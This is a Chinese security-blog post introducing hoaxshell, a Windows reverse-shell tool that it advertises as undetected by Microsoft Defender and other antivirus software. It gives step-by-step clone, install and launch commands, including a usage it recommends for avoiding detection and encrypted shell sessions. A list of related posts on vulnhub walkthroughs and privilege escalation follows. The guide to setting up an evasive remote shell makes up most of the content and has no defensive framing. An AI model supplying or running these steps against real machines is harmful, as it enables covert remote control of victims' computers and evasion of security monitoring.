Windows反向shell -- hoaxshell

VSole2023-04-04 10:28:54

0x01 工具介绍

hoaxshell 是一种非常规的 Windows 反向 shell，目前未被 Microsoft Defender 和可能的其他 AV 解决方案检测到，因为它完全基于 http(s) 流量。该工具易于使用，它生成自己的 PowerShell 有效负载并支持加密 (ssl)。

0x02 安装与使用

1、安装需要的库文件

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

2、通过 http 的基本 shell 会话

sudo python3 hoaxshell.py -s <your_ip>

3、避免检测的推荐用法（通过 http）

sudo python3 hoaxshell.py -s  -i -H "Authorization"

4、加密的 shell 会话 (https)

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365
# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s  -c  -k

5、具有可信证书的加密 shell 会话

sudo python3 hoaxshell.py -s <your.domain.com> -t -c path/to/cert.pem>
 -k 
<path/to/key.pem>

6、抓取会话模式

sudo python3 hoaxshell.py -s <your_ip> -g

0x03 下载地址

项目地址：https://github.com/t3l3machus/hoaxshell

如有侵权，请联系删除

shellsudo

本作品采用《CC 协议》，转载必须注明作者和本文链接

vulnhub之ha-natraj的实践

2023-05-29 15:40:49

今天实践的是vulnhub的ha-natraj镜像，下载地址，https://download.vulnhu

vulnhub之devguru的实践

2022-07-24 18:44:07

今天实践的是vulnhub的devguru镜像，下载地址，https://download.vulnhub.

vulnhub之darkhole2的实践

2022-07-10 15:32:30

今天实践的是vulnhub的darkhole2镜像，下载地址，https://download.vulnhu

6分钟带你剖析 Linux Sudo 高危提权漏洞的研究利用

2021-12-17 14:32:40

快速了解 Linux Sudo 高危提权漏洞的研究利用。

红队笔记专属-shell备忘录

2022-04-12 16:00:58

前言建议直接复制粘贴到笔记，或点赞收藏，因为时常会用到，这是整理的一些常见的反向shell和特权提升的笔记文档，红队成员必会！反向shell-备忘录通常在获得远程代码执行之后，我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互

vulnhub之Os-hackNos-3的实践

2021-12-26 14:55:46

好久没做攻击实践了，今天看了一下，手里还攒着6个vulnhub的镜像，算了一下，整好春节前把它们都实践完，今天实践的是Os-hackNos-3，用workstation导入成功，但是扫描不出来地址，换成virtualbox， sudo netdiscover -r 192.168.56.0/24，

vulnhub之cybox-1.1的实践

2022-08-14 12:30:50

今天实践的是vulnhub的cybox-1.1镜像，下载地址，https://download.vulnhu

linux提权-Suid和Guid配置错误

2021-12-31 06:45:59

描述SUID代表设置的用户ID，是一种Linux功能，允许用户在指定用户的许可下执行文件。

技术分享 | 关于Linux提权技术讲解

2021-10-24 06:29:02

大多数计算机系统设计为可与多个用户一起使用。特权是指允许用户执行的操作。普通特权包括查看和编辑文件或修改系统文件。特权升级意味着用户获得他们无权获得的特权。这些特权可用于删除文件，查看私人信息或安装不需要的程序，例如病毒。

一文吃透 Linux 提权

2021-10-23 07:09:32

特权升级意味着用户获得他们无权获得的特权。通常，当系统存在允许绕过安全性的错误或对使用方法的设计假设存在缺陷时，通常会发生这种情况。结果是，具有比应用程序开发人员或系统管理员想要的特权更多的应用程序可以执行未经授权的操作。

VSole

网络安全专家